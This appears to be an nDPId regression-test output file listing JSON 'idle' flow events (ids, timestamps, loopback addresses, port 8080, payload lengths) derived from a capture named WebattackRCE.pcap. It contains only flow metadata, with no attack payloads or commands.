+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277466,"flow_last_seen":1576420277466,"flow_idle_time":7560000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50554,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277467,"flow_last_seen":1576420277467,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50556,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277469,"flow_last_seen":1576420277469,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50558,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277471,"flow_last_seen":1576420277471,"flow_idle_time":7560000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50560,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277473,"flow_last_seen":1576420277473,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50562,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277474,"flow_last_seen":1576420277474,"flow_idle_time":7560000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50564,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277477,"flow_last_seen":1576420277477,"flow_idle_time":7560000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50566,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277478,"flow_last_seen":1576420277478,"flow_idle_time":7560000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50568,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277480,"flow_last_seen":1576420277480,"flow_idle_time":7560000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50570,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277488,"flow_last_seen":1576420277488,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50572,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277490,"flow_last_seen":1576420277490,"flow_idle_time":7560000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50574,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277491,"flow_last_seen":1576420277491,"flow_idle_time":7560000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50576,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277492,"flow_last_seen":1576420277492,"flow_idle_time":7560000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50578,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277495,"flow_last_seen":1576420277495,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50580,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277496,"flow_last_seen":1576420277496,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50582,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277497,"flow_last_seen":1576420277497,"flow_idle_time":7560000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50584,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277498,"flow_last_seen":1576420277498,"flow_idle_time":7560000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50586,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277499,"flow_last_seen":1576420277499,"flow_idle_time":7560000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50588,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277500,"flow_last_seen":1576420277500,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50590,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277501,"flow_last_seen":1576420277501,"flow_idle_time":7560000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50592,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277503,"flow_last_seen":1576420277503,"flow_idle_time":7560000,"flow_min_l4_payload_len":191,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":191,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50594,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277505,"flow_last_seen":1576420277505,"flow_idle_time":7560000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":153,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50596,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277506,"flow_last_seen":1576420277506,"flow_idle_time":7560000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50598,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277509,"flow_last_seen":1576420277509,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50600,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277510,"flow_last_seen":1576420277510,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50602,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277512,"flow_last_seen":1576420277512,"flow_idle_time":7560000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50604,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277513,"flow_last_seen":1576420277513,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50606,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277515,"flow_last_seen":1576420277515,"flow_idle_time":7560000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50608,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277516,"flow_last_seen":1576420277516,"flow_idle_time":7560000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50610,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277518,"flow_last_seen":1576420277518,"flow_idle_time":7560000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50612,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277519,"flow_last_seen":1576420277519,"flow_idle_time":7560000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50614,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277520,"flow_last_seen":1576420277520,"flow_idle_time":7560000,"flow_min_l4_payload_len":152,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":152,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50616,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277522,"flow_last_seen":1576420277522,"flow_idle_time":7560000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50618,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277525,"flow_last_seen":1576420277525,"flow_idle_time":7560000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50620,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277526,"flow_last_seen":1576420277526,"flow_idle_time":7560000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50622,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277527,"flow_last_seen":1576420277527,"flow_idle_time":7560000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50624,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277528,"flow_last_seen":1576420277528,"flow_idle_time":7560000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50626,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277534,"flow_last_seen":1576420277534,"flow_idle_time":7560000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50628,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277535,"flow_last_seen":1576420277535,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50630,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277536,"flow_last_seen":1576420277536,"flow_idle_time":7560000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50632,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277537,"flow_last_seen":1576420277537,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50634,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277538,"flow_last_seen":1576420277538,"flow_idle_time":7560000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50636,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277540,"flow_last_seen":1576420277540,"flow_idle_time":7560000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50638,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277543,"flow_last_seen":1576420277543,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50640,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277544,"flow_last_seen":1576420277544,"flow_idle_time":7560000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50642,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277546,"flow_last_seen":1576420277546,"flow_idle_time":7560000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50644,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
